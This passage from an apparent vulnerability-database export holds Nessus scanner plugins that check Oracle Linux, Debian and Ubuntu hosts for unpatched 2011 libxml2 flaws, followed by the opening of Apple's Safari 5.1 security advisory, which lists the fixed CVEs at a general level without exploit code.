potentially,\nexecute arbitrary code with the privileges of the user running the\napplication. (CVE-2011-3919)\n\nAn off-by-one error, leading to a heap-based buffer overflow, was\nfound in the way libxml2 parsed certain XML files. A remote attacker\ncould provide a specially crafted XML file that, when opened in an\napplication linked against libxml2, would cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2011-0216)\n\nA flaw was found in the way libxml2 parsed certain XPath expressions.\nIf an attacker were able to supply a specially crafted XML file to an\napplication using libxml2, as well as an XPath expression for that\napplication to run against the crafted file, it could cause the\napplication to crash. (CVE-2011-2834)\n\nNote: Red Hat does not ship any applications that use libxml2 in a way\nthat would allow the CVE-2011-2834 flaw to be exploited; however,\nthird-party applications may allow XPath expressions to be passed\nwhich could trigger this flaw.\n\nAn out-of-bounds memory read flaw was found in libxml2. A remote\nattacker could provide a specially crafted XML file that, when opened\nin an application linked against libxml2, would cause the application\nto crash. (CVE-2011-3905)\n\nAll users of libxml2 are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The desktop\nmust be restarted (log out, then log back in) for this update to take\neffect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-January/002547.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libxml2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libxml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libxml2-python\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/07/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"libxml2-2.6.16-12.9.0.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"libxml2-devel-2.6.16-12.9.0.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"libxml2-python-2.6.16-12.9.0.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2 / libxml2-devel / libxml2-python\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:21:10", "bulletinFamily": "scanner", "description": "Many security problems have been fixed in libxml2, a popular library\nto handle XML data files.\n\n - CVE-2011-3919 :\n Juri Aedla discovered a heap-based buffer overflow that\n allows remote attackers to cause a denial of service or\n possibly have unspecified other impact via unknown\n vectors.\n\n - CVE-2011-0216 :\n An Off-by-one error have been discovered that allows\n remote attackers to execute arbitrary code or cause a\n denial of service.\n\n - CVE-2011-2821 :\n A memory corruption (double free) bug has been\n identified in libxml2", "modified": "2019-11-02T00:00:00", "id": "DEBIAN_DSA-2394.NASL", "href": "https://www.tenable.com/plugins/nessus/57702", "published": "2012-01-27T00:00:00", "title": "Debian DSA-2394-1 : libxml2 - several vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2394. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57702);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/11/10 11:49:35\");\n\n script_cve_id(\"CVE-2011-0216\", \"CVE-2011-2821\", \"CVE-2011-2834\", \"CVE-2011-3905\", \"CVE-2011-3919\");\n script_bugtraq_id(48832, 49279, 49658, 51084, 51300);\n script_xref(name:\"DSA\", value:\"2394\");\n\n script_name(english:\"Debian DSA-2394-1 : libxml2 - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Many security problems have been fixed in libxml2, a popular library\nto handle XML data files.\n\n - CVE-2011-3919 :\n Juri Aedla discovered a heap-based buffer overflow that\n allows remote attackers to cause a denial of service or\n possibly have unspecified other impact via unknown\n vectors.\n\n - CVE-2011-0216 :\n An Off-by-one error have been discovered that allows\n remote attackers to execute arbitrary code or cause a\n denial of service.\n\n - CVE-2011-2821 :\n A memory corruption (double free) bug has been\n identified in libxml2's XPath engine. Through it, it is\n possible for an attacker to cause a denial of service or\n possibly have unspecified other impact. This\n vulnerability does not affect the oldstable distribution\n (lenny).\n\n - CVE-2011-2834 :\n Yang Dingning discovered a double free vulnerability\n related to XPath handling.\n\n - CVE-2011-3905 :\n An out-of-bounds read vulnerability had been discovered,\n which allows remote attackers to cause a denial of\n service.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=652352\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=643648\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=656377\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-3919\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-0216\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-2821\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-2834\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-3905\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/libxml2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2012/dsa-2394\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the libxml2 packages.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 2.6.32.dfsg-5+lenny5.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 2.7.8.dfsg-2+squeeze2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"libxml2\", reference:\"2.6.32.dfsg-5+lenny5\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libxml2\", reference:\"2.7.8.dfsg-2+squeeze2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libxml2-dbg\", reference:\"2.7.8.dfsg-2+squeeze2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libxml2-dev\", reference:\"2.7.8.dfsg-2+squeeze2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libxml2-doc\", reference:\"2.7.8.dfsg-2+squeeze2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libxml2-utils\", reference:\"2.7.8.dfsg-2+squeeze2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"python-libxml2\", reference:\"2.7.8.dfsg-2+squeeze2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"python-libxml2-dbg\", reference:\"2.7.8.dfsg-2+squeeze2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:30:33", "bulletinFamily": "scanner", "description": "It was discovered that libxml2 contained an off by one error. If a\nuser or application linked against libxml2 were tricked into opening a\nspecially crafted XML file, an attacker could cause the application to\ncrash or possibly execute arbitrary code with the privileges of the\nuser invoking the program. (CVE-2011-0216)\n\nIt was discovered that libxml2 is vulnerable to double-free conditions\nwhen parsing certain XML documents. This could allow a remote attacker\nto cause a denial of service. (CVE-2011-2821, CVE-2011-2834)\n\nIt was discovered that libxml2 did not properly detect end of file\nwhen parsing certain XML documents. An attacker could exploit this to\ncrash applications linked against libxml2. (CVE-2011-3905)\n\nIt was discovered that libxml2 did not properly decode entity\nreferences with long names. If a user or application linked against\nlibxml2 were tricked into opening a specially crafted XML file, an\nattacker could cause the application to crash or possibly execute\narbitrary code with the privileges of the user invoking the program.\n(CVE-2011-3919).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "UBUNTU_USN-1334-1.NASL", "href": "https://www.tenable.com/plugins/nessus/57615", "published": "2012-01-20T00:00:00", "title": "Ubuntu 8.04 LTS / 10.04 LTS / 10.10 / 11.04 / 11.10 : libxml2 vulnerabilities (USN-1334-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1334-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57615);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/09/19 12:54:27\");\n\n script_cve_id(\"CVE-2011-0216\", \"CVE-2011-2821\", \"CVE-2011-2834\", \"CVE-2011-3905\", \"CVE-2011-3919\");\n script_bugtraq_id(48832, 49279, 49658, 51084, 51300);\n script_xref(name:\"USN\", value:\"1334-1\");\n\n script_name(english:\"Ubuntu 8.04 LTS / 10.04 LTS / 10.10 / 11.04 / 11.10 : libxml2 vulnerabilities (USN-1334-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that libxml2 contained an off by one error. If a\nuser or application linked against libxml2 were tricked into opening a\nspecially crafted XML file, an attacker could cause the application to\ncrash or possibly execute arbitrary code with the privileges of the\nuser invoking the program. (CVE-2011-0216)\n\nIt was discovered that libxml2 is vulnerable to double-free conditions\nwhen parsing certain XML documents. This could allow a remote attacker\nto cause a denial of service. (CVE-2011-2821, CVE-2011-2834)\n\nIt was discovered that libxml2 did not properly detect end of file\nwhen parsing certain XML documents. An attacker could exploit this to\ncrash applications linked against libxml2. (CVE-2011-3905)\n\nIt was discovered that libxml2 did not properly decode entity\nreferences with long names. If a user or application linked against\nlibxml2 were tricked into opening a specially crafted XML file, an\nattacker could cause the application to crash or possibly execute\narbitrary code with the privileges of the user invoking the program.\n(CVE-2011-3919).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1334-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libxml2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/07/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2012-2019 Canonical, Inc. / NASL script (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(8\\.04|10\\.04|10\\.10|11\\.04|11\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.04 / 10.04 / 10.10 / 11.04 / 11.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libxml2\", pkgver:\"2.6.31.dfsg-2ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libxml2\", pkgver:\"2.7.6.dfsg-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libxml2\", pkgver:\"2.7.7.dfsg-4ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"libxml2\", pkgver:\"2.7.8.dfsg-2ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"libxml2\", pkgver:\"2.7.8.dfsg-4ubuntu0.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:41", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nAPPLE-SA-2011-07-20-1 Safari 5.1 and Safari 5.0.6\r\n\r\nSafari 5.1 and Safari 5.0.6 are now available and address the\r\nfollowing:\r\n\r\nCFNetwork\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: Visiting a maliciously crafted website may lead to a cross-\r\nsite scripting attack\r\nDescription: In certain situations, Safari may treat a file as HTML,\r\neven if it is served with the 'text/plain' content type. This may\r\nlead to a cross-site scripting attack on sites that allow untrusted\r\nusers to post text files. This issue is addressed through improved\r\nhandling of 'text/plain' content.\r\nCVE-ID\r\nCVE-2010-1420 : Hidetake Jo working with Microsoft Vulnerability\r\nResearch (MSVR), Neal Poole of Matasano Security\r\n\r\nCFNetwork\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: Authenticating to a maliciously crafted website may lead to\r\narbitrary code execution\r\nDescription: The NTLM authentication protocol is susceptible to a\r\nreplay attack referred to as credential reflection. Authenticating to\r\na maliciously crafted website may lead to arbitrary code execution.\r\nTo mitigate this issue, Safari has been updated to utilize protection\r\nmechanisms recently added to Windows. This issue does not affect Mac\r\nOS X systems.\r\nCVE-ID\r\nCVE-2010-1383 : Takehiro Takahashi of IBM X-Force Research\r\n\r\nCFNetwork\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: A root certificate that is disabled may still be trusted\r\nDescription: CFNetwork did not properly validate that a certificate\r\nwas trusted for use by a SSL server. As a result, if the user had\r\nmarked a system root certificate as not trusted, Safari would still\r\naccept certificates signed by that root. This issue is addressed\r\nthrough improved certificate validation. This issue does not affect\r\nMac OS X systems.\r\nCVE-ID\r\nCVE-2011-0214 : An anonymous reporter\r\n\r\nColorSync\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: Viewing a maliciously crafted image with an embedded\r\nColorSync profile may lead to an unexpected application termination\r\nor arbitrary code execution\r\nDescription: An integer overflow existed in the handling of images\r\nwith an embedded ColorSync profile, which may lead to a heap buffer\r\noverflow. Opening a maliciously crafted image with an embedded\r\nColorSync profile may lead to an unexpected application termination\r\nor arbitrary code execution. For Mac OS X v10.5 systems, this issue\r\nis addressed in Security Update 2011-004.\r\nCVE-ID\r\nCVE-2011-0200 : binaryproof working with TippingPoint's Zero Day\r\nInitiative\r\n\r\nCoreFoundation\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: Applications that use the CoreFoundation framework may be\r\nvulnerable to an unexpected application termination or arbitrary code\r\nexecution\r\nDescription: An off-by-one buffer overflow issue existed in the\r\nhandling of CFStrings. Applications that use the CoreFoundation\r\nframework may be vulnerable to an unexpected application termination\r\nor arbitrary code execution. For Mac OS X v10.6 systems, this issue\r\nis addressed in Mac OS X v10.6.8.\r\nCVE-ID\r\nCVE-2011-0201 : Harry Sintonen\r\n\r\nCoreGraphics\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: Opening a maliciously crafted PDF file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: An integer overflow issue existed in the handling of\r\nType 1 fonts. Viewing or downloading a document containing a\r\nmaliciously crafted embedded font may lead to arbitrary code\r\nexecution. For Mac OS X v10.6 systems, this issue is addressed in Mac\r\nOS X v10.6.8. For Mac OS X v10.5 systems, this issue is addressed in\r\nSecurity Update 2011-004.\r\nCVE-ID\r\nCVE-2011-0202 : Cristian Draghici of Modulo Consulting, Felix Grobert\r\nof the Google Security Team\r\n\r\nInternational Components for Unicode\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: Applications that use ICU may be vulnerable to an unexpected\r\napplication termination or arbitrary code execution\r\nDescription: A buffer overflow issue existed in ICU's handling of\r\nuppercase strings. Applications that use ICU may be vulnerable to an\r\nunexpected application termination or arbitrary code execution. For\r\nMac OS X v10.6 systems, this issue is addressed in Mac OS X v10.6.8.\r\nCVE-ID\r\nCVE-2011-0206 : David Bienvenu of Mozilla\r\n\r\nImageIO\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: Viewing a maliciously crafted TIFF image may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A heap buffer overflow existed in ImageIO's handling of\r\nTIFF images. Viewing a maliciously crafted TIFF image may lead to an\r\nunexpected application termination or arbitrary code execution. For\r\nMac OS X v10.6 systems, this issue is addressed in Mac OS X v10.6.8.\r\nFor Mac OS X v10.5 systems, this issue is addressed in Security\r\nUpdate 2011-004.\r\nCVE-ID\r\nCVE-2011-0204 : Dominic Chell of NGS Secure\r\n\r\nImageIO\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: Viewing a maliciously crafted TIFF image may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A heap buffer overflow existed in ImageIO's handling of\r\nCCITT Group 4 encoded TIFF images. Viewing a maliciously crafted TIFF\r\nimage may lead to an unexpected application termination or arbitrary\r\ncode execution.\r\nCVE-ID\r\nCVE-2011-0241 : Cyril CATTIAUX of Tessi Technologies\r\n\r\nImageIO\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: Viewing a maliciously crafted TIFF image may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A reentrancy issue existed in ImageIO's handling of\r\nTIFF images. Viewing a maliciously crafted TIFF image may lead to an\r\nunexpected application termination or arbitrary code execution. This\r\nissue does not affect Mac OS X systems.\r\nCVE-ID\r\nCVE-2011-0215 : Juan Pablo Lopez Yacubian working with iDefense VCP\r\n\r\nImageIO\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: Viewing a maliciously crafted TIFF image may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A heap buffer overflow existed in ImageIO's handling of\r\nTIFF images. Viewing a maliciously crafted TIFF image may lead to an\r\nunexpected application termination or arbitrary code execution. For\r\nMac OS X v10.6 systems, this issue is addressed in Mac OS X v10.6.8.\r\nFor Mac OS X v10.5 systems, this issue is addressed in Security\r\nUpdate 2011-004.\r\nCVE-ID\r\nCVE-2011-0204 : Dominic Chell of NGS Secure\r\n\r\nlibxslt\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: Visiting a maliciously crafted website may lead to the\r\ndisclosure of addresses on the heap\r\nDescription: libxslt's implementation of the generate-id() XPath\r\nfunction disclosed the address of a heap buffer. Visiting a\r\nmaliciously crafted website may lead to the disclosure of addresses\r\non the heap. This issue is addressed by generating an ID based on the\r\ndifference between the addresses of two heap buffers. For Mac OS X\r\nv10.6 systems, this issue is addressed in Mac OS X v10.6.8. For Mac\r\nOS X v10.5 systems, this issue is addressed in Security Update\r\n2011-004.\r\nCVE-ID\r\nCVE-2011-0195 : Chris Evans of the Google Chrome Security Team\r\n\r\nlibxml\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: Visiting a maliciously crafted website may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A one-byte heap buffer overflow existed in libxml's\r\nhandling of XML data. Visiting a maliciously crafted website may lead\r\nto an unexpected application termination or arbitrary code execution.\r\nCVE-ID\r\nCVE-2011-0216 : Billy Rios of the Google Security Team\r\n\r\nSafari\r\nAvailable for: Mac OS X v10.6.8 or later,\r\nMac OS X Server v10.6.8 or later, Windows 7, Vista, XP SP2 or later\r\nImpact: If the "AutoFill web forms" feature is enabled, visiting a\r\nmaliciously crafted website and typing may lead to the disclosure of\r\ninformation from the user's Address Book\r\nDescription: Safari's "AutoFill web forms" feature filled in non-\r\nvisible form fields, and the information was accessible by scripts on\r\nthe site before the user submitted the form. This issue is addressed\r\nby displaying all fields that will be filled, and requiring the\r\nuser's consent before AutoFill information is available to the form.\r\nCVE-ID\r\nCVE-2011-0217 : Florian Rienhardt of BSI, Alex Lambert, [Jeremiah\r\nGrossman]\r\n\r\nSafari\r\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\r\nMac OS X v10.6.8 or later, Mac OS X Server v10.6.8 or later,\r\nWindows 7, Vista, XP SP2 or later\r\nImpact: With a certain Java configuration, visiting a malicious\r\nwebsite may lead to unexpected text being displayed on other sites\r\nDescription: A cross origin issue existed in the handling of Java\r\nApplets. This applies when Java is enabled in Safari, and Java is\r\nconfigured to run within the browser process. Fonts loaded by a Java\r\napplet could affect the display of text content from other sites.\r\nThis issue is addressed by running Java applets in a separate\r\nprocess.\r\nCVE-ID\r\nCVE-2011-0219 : Joshua Smith of Kaon Interactive\r\n\r\nWebKit\r\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\r\nMac OS X v10.6.8 or later, Mac OS X Server v10.6.8 or later,\r\nWindows 7, Vista, XP SP2 or later\r\nImpact: Visiting a maliciously crafted website may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Multiple memory corruption issues existed in WebKit.\r\nVisiting a maliciously crafted website may lead to an unexpected\r\napplication termination or arbitrary code execution.\r\nCVE-ID\r\nCVE-2010-1823 : David Weston of Microsoft and Microsoft Vulnerability\r\nResearch (MSVR), wushi of team509, and Yong Li of Research In Motion\r\nLtd\r\nCVE-2011-0164 : Apple\r\nCVE-2011-0218 : SkyLined of Google Chrome Security Team\r\nCVE-2011-0221 : Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam\r\nCVE-2011-0222 : Nikita Tarakanov and Alex Bazhanyuk of the CISS\r\nResearch Team, and Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam\r\nCVE-2011-0223 : Jose A. Vazquez of spa-s3c.blogspot.com working with\r\niDefense VCP\r\nCVE-2011-0225 : Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam\r\nCVE-2011-0232 : J23 working with TippingPoint's Zero Day Initiative\r\nCVE-2011-0233 : wushi of team509 working with TippingPoint's Zero Day\r\nInitiative\r\nCVE-2011-0234 : Rob King working with TippingPoint's Zero Day\r\nInitiative, wushi of team509 working with TippingPoint's Zero Day\r\nInitiative, wushi of team509 working with iDefense VCP\r\nCVE-2011-0235 : Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam\r\nCVE-2011-0237 : wushi of team509 working with iDefense VCP\r\nCVE-2011-0238 : Adam Barth of Google Chrome Security Team\r\nCVE-2011-0240 : wushi of team509 working with iDefense VCP\r\nCVE-2011-0253 : Richard 